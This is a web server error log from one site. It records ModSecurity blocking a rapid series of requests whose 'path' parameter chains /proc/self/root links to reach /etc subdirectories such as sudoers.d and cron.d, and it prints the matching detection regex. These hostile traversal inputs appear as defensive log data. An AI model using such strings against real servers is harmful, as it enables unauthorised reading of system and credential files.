[Mon Mar 16 08:25:11.501371 2026] [:error] [pid 32654:tid 140411716749056] [client 74.7.241.46:46674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfolwlT9VtDQc7bgUyNEwAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:25:13.710320 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.241.46:46686] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfomY6lpbStxTqkSktR8wAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:25:14.221087 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.228.16:45146] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfomrABkC4fWIHEf8HQ6AAAAEg"]
[Mon Mar 16 08:25:16.328599 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.241.46:46700] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfonJqj1wV0Si-OkefNtAAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:25:22.151214 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:32880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfooo6lpbStxTqkSktR_AAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:24.557794 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.243.203:48456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfopP9ocpUE4ed4uDzTKQAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:25.890321 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:48468] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfopQlT9VtDQc7bgUyNIgAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:27.258432 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:48480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfop46lpbStxTqkSktR_gAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:28.552790 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:48494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoqLysWC90G-1nBrAqmQAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:29.845550 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.243.203:48498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoqXbQATo66fKoS7wvSQAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:31.180072 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:59994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoq9SswJuvopo3lOhFQQAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:32.326541 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.243.203:60004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abforHjZBu2q05ozVU86NQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:34.622700 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:46706] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abforf9ocpUE4ed4uDzTMQAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:25:35.936104 2026] [:error] [pid 10709:tid 140411557287680] [client 74.7.241.46:46342] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abforxXjF1vJNtV6CWrfcgAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:25:37.238663 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.241.46:46344] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfosbABkC4fWIHEf8HQ7AAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:25:38.533518 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.241.46:51924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfospqj1wV0Si-OkefNuQAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:25:38.847380 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:60018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfosnbQATo66fKoS7wvUAAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:40.168957 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:34482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfotHjZBu2q05ozVU86OQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:41.488988 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:34498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfotZqj1wV0Si-OkefNugAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:44.875417 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:34506] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfouLysWC90G-1nBrAqoQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:46.188468 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.243.203:34512] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfounjZBu2q05ozVU86OgAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:47.564795 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.243.203:34520] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfou3jZBu2q05ozVU86OwAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:50.039337 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:34522] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfovo6lpbStxTqkSktSAQAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:51.369155 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.243.203:43468] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfovxXjF1vJNtV6CWrfdwAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
